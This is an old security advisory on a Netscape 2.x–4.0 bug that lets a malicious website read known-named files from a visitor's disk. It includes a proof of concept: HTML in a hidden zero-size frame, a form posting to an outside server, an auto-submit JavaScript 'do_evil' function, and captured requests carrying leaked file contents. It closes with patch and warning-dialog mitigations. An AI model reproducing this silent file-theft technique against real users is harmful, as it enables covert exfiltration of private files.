

    Systems running  Netscape 2.x,  3.x and  4.0 (Windows,  Macintosh,
    and Unix)


    The bug makes it possible for Web-site operators to read  anything
    stored on the hard drive of a PC logged on to the Web site.

    CNNfn's  (they  found  it)  test  showed  that  Internet  security
    firewalls offer no protection from the bug.

    To  exploit  this  you  have  to  know  information about victim's
    system and you also have to know the file name you want to abuse.

    No techinal details yet.  There are rumours that this is  probably
    caused by the  support of <INPUT  TYPE=FILE> tag. This  tag allows
    you  to  send  a  file  to  a  server  side  CGI  program with the
    multi-part  mime  type.  As  it  is  an  "Input type" tag, you can
    assign a default value to it.  You can than write maybe a  Java or
    a JavaScript to force submit the form data containing the  content
    of the specified file to your CGI program.

    Below,  is  what  Paul  T.  Kooros  sent  to  Netscape, and mainly
    exploits a bug  in how Netscape  repopulates form data  should you
    reload (or  go back  in history  to) a  form which  you previously
    filled in.   As a security  measure, <INPUT TYPE="FILE"  ...> have
    never  been  initializable  via   a  VALUE=  attribute  or   using
    JavaScript.  As a convenience measure, Netscape tries to  remember
    what you had  typed into a  form previously, and  repopulate it if
    you should press reload or go  back in your browser history.   The
    bug manifests itself when you  reload a form, but change  slightly
    the form contents.

    The form below, in the frame TopFrame, has two elements in advance
    of <INPUT  TYPE="FILE" ...>,  a HIDDEN  and a  TEXT.   The TEXT is
    wickedly  initialized  with  the  secret  evil filename.  When the
    form  is  reloaded,  the  server  (via  a CGI script, for example)
    generates  a  slightly  different  form,  minus  only  the  HIDDEN
    element.  Netscape  mistakenly fills in  the FILE field  with what
    was in the TEXT box.  The form is then submitted using JavaScript.

    You  might  note  that  the  user  sees  only  the  bottom  frame,
    containing   the   history   of   shoelaces   or  whatever,  while
    unbeknownst  to  him  in  a  0-size  frame,  the  form is loading,
    reloading, submitting and uploading.

    You  should  note,  of  course,  that  file  access  is  with  the
    premissions of  the user  only, not  with root  or any  other more
    intrusive privs.

    Testing Notes:  To  see what is happening  in the top frame,  just
    change "0,*" to  "400,*" or something  in the FRAMESET  tag.  Paul
    will try to  come up with  a CGI script  which automates the  form
    change.   Increase the  timeout in  the onLoad  attrib to get more
    time to make  the change. suggested that  the
    form  might  be  generated  entirely  using  JavaScript,  with the
    script loading the frame.

    ------------ >8 --------------- >8 --------------- >8 ------------
    Bug Symptom:
        Malicious server can obtain any client file of known filename

    Bug How-to:
    (1)     Server  supplied  obscured   (zero  size,    scrolling=no,
            noresize)  frame  source  contains  a  form with an <INPUT
            TYPE="FILE"> element.

    (2)     Server  supplies   companion  non-obscured   frame,  which
            contains an apparently legitimate link to somewhere else.

    (3)     After a brief JavaScript  timeout, the obscured frame   is
            reloaded.  BUT this  time, the server supplies  a slightly
            different form  source with  one fewer  element before the
            <INPUT TYPE="FILE"...>.   This causes  the  initialization
            string from  the previous  element (a  <INPUT TYPE="TEXT">
            in the  example below)  to be  scooted down  into the FILE
            element filename box.

    (4)     The non-obscured  frame the submits the form, either as  a
            JavaScript  setTimeout(),  or  to  be  more  sneaky, as an
            onClick action  of the  apparently legitimate  link.  Thus
            the file is transmitted.

    Below are the sample files I used to exploit the bug, followed  by
    the  HTTP  request  made  by  the  client to my bogus debug server
    (port 8180).   Please note  that I  simulated the  changed file of
    (3)  by  quickly  saving  out  a  new  copy  of the obscured frame
    (top.html) from my  editor, rather than  writing a CGI  which kept
    state  and  handed  out  alternate  versions.   (The  first   form
    element, a HIDDEN, is "commented" out).

    ::  Main HTML file first.html

        <HTML> <HEAD>
        <TITLE>File Upload Example</TITLE>
        <FRAMESET ROWS="0,*">
        <FRAME NAME="TopFrame" SRC="top.html" SCROLLING="NO" NORESIZE>
        <FRAME NAME="BottomFrame" SRC="bottom.html">

    ::  Obscured frame (1st case) top.html

        <TITLE>File Upload Example</TITLE>
        <FORM ENCTYPE="multipart/form-data" ACTION="http://kooros.kooros.COM:8180/bogus" METHOD="POST">
        <INPUT TYPE="HIDDEN" NAME="z" VALUE="Whatever"><BR>
        Name of the file I want:
        <INPUT TYPE="TEXT" NAME="Uname" VALUE="/my/secret/filename"><BR>
        File:<INPUT TYPE="FILE" NAME="Fname"><BR>
        Submit:<INPUT TYPE="SUBMIT" NAME="Sub" VALUE="Go"><BR>
        Reset:<INPUT TYPE="RESET" NAME="Res" VALUE="Reset"><BR>

    ::  Obscured frame (2nd case) top.html

        <TITLE>File Upload Example</TITLE>
        <FORM ENCTYPE="multipart/form-data" ACTION="http://kooros.kooros.COM:8180/bogus" METHOD="POST">
        <INPUT TYPE="HIDDEN" NAME="z" VALUE="Whatever"><BR>
        Name of the file I want:
        <INPUT TYPE="TEXT" NAME="Uname" VALUE="/my/secret/filename"><BR>
        File:<INPUT TYPE="FILE" NAME="Fname"><BR>
        Submit:<INPUT TYPE="SUBMIT" NAME="Sub" VALUE="Go"><BR>
        Reset:<INPUT TYPE="RESET" NAME="Res" VALUE="Reset"><BR>

    ::  NON-Obscured frame bottom.html
        <TITLE>File Upload Example</TITLE>
        <!-- 1000ms long enough to load initial top form? -->
        <BODY onLoad="setTimeout('do_evil();', 1000);">
        This is a <A HREF="" TARGET="_top"
        onClick="parent.frames[0].document.forms[0].submit();return true;">link</A> to somewhere legitimate.
        <SCRIPT LANGUAGE="JavaScript">
        function do_evil() {
        // Optional Evilness for automatic submission:
        //      setTimeout("parent.frames[0].document.forms[0].submit();", 1000);

    ::  Resulting Output from exploiting bug on Mozilla/3.01 SunOS4.1.4 UNIX:

        POST /bogus HTTP/1.0
        Referer: file:/jaz/web/fupld/top.html
        Connection: Keep-Alive
        User-Agent: Mozilla/3.01 (X11; I; SunOS 4.1C sun4)
        Host: kooros.kooros.COM:8180
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
        Content-type: multipart/form-data; boundary=---------------------------8720784031874748096916896761
        Content-Length: 369

        Content-Disposition: form-data; name="Uname"

        Content-Disposition: form-data; name="Fname"; filename="foofile.x"

        This is a test file
        with three lines
        in it.


    ::  Resulting Output from exploiting bug on Mozilla/3.01 Win95:

        POST /bogus HTTP/1.0
        Referer: file://Kooros/jaz/web/fupld/top.html
        Proxy-Connection: Keep-Alive
        Host: kooros.kooros.COM:8180
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
        Content-type: multipart/form-data; boundary=---------------------------2635128057161
        Content-Length: 309
        User-Agent: Mozilla/3.01 (Win95; I)  via proxy gateway  CERN-HTTPD/3.0 libwww/2.17

        Content-Disposition: form-data; name="Uname"

        Content-Disposition: form-data; name="Fname"; filename="C:\paul\foom"

        This is a secret
        file of two lines.



    To remove any  risk of this  bug, Navigator users  should download
    the updated  version of  Communicator or  Navigator, that includes
    the fix.  In the interim, users of Navigator 3.0 and  Communicator
    4.0 can take  the following steps  to enable warning  dialog boxes
    to detect and cancel form submissions:

    In Navigator 3.0: Go   to  the   Options menu and select  Security
                      Preferences.  Select  the  "Submitting  a   Form
                      Insecurely"  preference  to  enable that warning
                      dialog box.

    In Navigator 4.0: Select   the  lock   in the toolbar to  open the
                      Security Advisor. Select Navigator, then  select
                      the "Sending Unencrypted Information to a  Site"
                      preference to enable that warning dialog box.

    Communicator 4.01 for Windows (includes the fix for this):

	Users of Netscape 3.0 should upgrade to Netscape 3.02.